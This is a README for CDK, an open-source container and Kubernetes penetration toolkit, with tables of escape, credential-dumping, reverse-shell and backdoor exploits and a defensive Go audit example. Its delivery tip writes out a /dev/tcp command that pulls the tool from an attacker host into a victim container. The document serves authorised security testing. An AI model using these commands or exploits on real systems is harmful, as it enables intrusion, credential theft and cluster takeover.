cdk-team / Cdk

Licence: gpl-2.0
CDK is an open-sourced container penetration toolkit, offering stable exploitation in different slimmed containers without any OS dependency. It comes with penetration tools and many powerful PoCs/EXPs that help you escape containers and take over K8s clusters easily.

CDK - Zero Dependency Container Penetration Toolkit

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed to offer stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs that help you escape containers and take over K8s clusters easily.

Installation/Delivery

Download the latest release from https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload the CDK binary directly.

If you have an RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host the CDK binary on your host with a public IP.

     (on your host)
     nc -lvp 999 < cdk

  2. Inside the victim container, execute:

     cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
     chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk auto-escape <cmd>
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside the container to find potential weaknesses.
  2. Exploit: container escaping, persistence and lateral movement.
  3. Tool: network tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command runs the scripts below without local file scanning; use --full to enable all of them.

Tactics                Script                                    Supported  Usage/Example
Information Gathering  OS Basic Info                                        link
Information Gathering  Available Capabilities                               link
Information Gathering  Available Linux Commands                             link
Information Gathering  Mounts                                               link
Information Gathering  Net Namespace                                        link
Information Gathering  Sensitive ENV                                        link
Information Gathering  Sensitive Process                                    link
Information Gathering  Sensitive Local Files                                link
Information Gathering  Kube-proxy Route Localnet(CVE-2020-8558)             link
Discovery              K8s Api-server Info                                  link
Discovery              K8s Service-account Info                             link
Discovery              Cloud Provider Metadata API                          link
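
The "Available Capabilities" and "Mounts" rows above correspond to two files under /proc that a defender can audit directly. The following Go program is an added example, not CDK's own code: it decodes a CapEff mask and scans mountinfo text for host-exposing settings. The function name Audit, the four capabilities chosen, the three mount rules and the sample input are assumptions made for this illustration.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Capability bits (linux/capability.h) a hardened container should not hold (assumed list).
var capNames = map[uint]string{2: "CAP_DAC_READ_SEARCH", 16: "CAP_SYS_MODULE",
	19: "CAP_SYS_PTRACE", 21: "CAP_SYS_ADMIN"}

// Audit returns findings from a CapEff hex mask (/proc/<pid>/status) and mountinfo text.
func Audit(capEff, mountinfo string) ([]string, error) {
	mask, err := strconv.ParseUint(strings.TrimSpace(capEff), 16, 64)
	if err != nil {
		return nil, err
	}
	var out []string
	for _, bit := range []uint{2, 16, 19, 21} { // fixed order keeps output stable
		if mask>>bit&1 == 1 {
			out = append(out, "capability "+capNames[bit])
		}
	}
	for _, line := range strings.Split(mountinfo, "\n") {
		parts := strings.SplitN(line, " - ", 2) // " - " ends the optional fields
		pre, post := strings.Fields(parts[0]), strings.Fields(parts[len(parts)-1])
		if len(parts) != 2 || len(pre) < 6 || len(post) < 1 {
			continue // not a well-formed mountinfo line
		}
		mnt, fstype, rw := pre[4], post[0], strings.Contains(","+pre[5]+",", ",rw,")
		switch {
		case strings.HasSuffix(mnt, "/docker.sock"):
			out = append(out, "docker socket at "+mnt)
		case rw && fstype == "proc" && mnt != "/proc":
			out = append(out, "writable extra procfs at "+mnt)
		case rw && strings.HasPrefix(fstype, "cgroup"):
			out = append(out, "writable cgroup at "+mnt)
		}
	}
	return out, nil
}

func main() { // constructed sample: privileged container with the Docker socket mounted
	mounts := "812 650 0:98 / /proc rw,nosuid - proc proc rw\n" +
		"815 650 0:101 / /sys/fs/cgroup rw,nosuid - cgroup2 cgroup rw\n" +
		"830 650 0:25 /docker.sock /run/docker.sock rw,nosuid - tmpfs tmpfs rw"
	fmt.Println(Audit("0000003fffffffff", mounts))
}
```

An empty result for a workload means none of these specific exposures is present; it does not cover the other rows of the table.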

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]

Tactic                Technique                        CDK Exploit Name        Supported  In Thin  Doc
Escaping              docker-runc CVE-2019-5736        runc-pwn
Escaping              containerd-shim CVE-2020-15257   shim-pwn                                    link
Escaping              docker.sock PoC (DIND attack)    docker-sock-check                           link
Escaping              docker.sock RCE                  docker-sock-pwn                             link
Escaping              Docker API(2375) RCE             docker-api-pwn                              link
Escaping              Device Mount Escaping            mount-disk                                  link
Escaping              LXCFS Escaping                   lxcfs-rw                                    link
Escaping              Cgroups Escaping                 mount-cgroup                                link
Escaping              Procfs Escaping                  mount-procfs                                link
Escaping              Ptrace Escaping PoC              check-ptrace                                link
Escaping              Rewrite Cgroup(devices.allow)    rewrite-cgroup-devices                      link
Discovery             K8s Component Probe              service-probe                               link
Discovery             Dump Istio Sidecar Meta          istio-check                                 link
Remote Control        Reverse Shell                    reverse-shell                               link
Credential Access     Access Key Scanning              ak-leakage                                  link
Credential Access     Dump K8s Secrets                 k8s-secret-dump                             link
Credential Access     Dump K8s Config                  k8s-configmap-dump                          link
Privilege Escalation  K8s RBAC Bypass                  k8s-get-sa-token                            link
Persistence           Deploy WebShell                  webshell-deploy                             link
Persistence           Deploy Backdoor Pod              k8s-backdoor-daemonset                      link
Persistence           Deploy Shadow K8s api-server     k8s-shadow-apiserver                        link
Persistence           K8s MITM Attack (CVE-2020-8554)  k8s-mitm-clusterip                          link
Persistence           Deploy K8s CronJob               k8s-cronjob                                 link

Note about Thin: The thin version is prepared for container shells with a short life cycle, such as Serverless. To stay lighter, it cuts a very few exploits that would make the program fat.

Tool Module

Run these commands as you would in Linux; the input arguments differ slightly, see the usage link.

cdk nc [options]
cdk ps

Command   Description                     Supported  Usage/Example
nc        TCP Tunnel                                 link
ps        Process Information                        link
ifconfig  Network Information                        link
vi        Edit Files                                 link
kcurl     Request to K8s api-server                  link
dcurl     Request to Docker HTTP API                 link
ucurl     Request to Docker Unix Socket              link
rcurl     Request to Docker Registry API
probe     IP/Port Scanning                           link

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

By reporting any issues, ideas or PRs, your GitHub ID will be listed here.

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Running screenshots or logs before and after you fix the problem.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please enable a sustainable environment for us to review contributions.
  • Screenshots about how this new feature works.
  • If you are committing a new evaluate/exploit script, please add a simple doc to your PR message, here is an example.

Events

404StarLink 2.0 - Galaxy

Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam
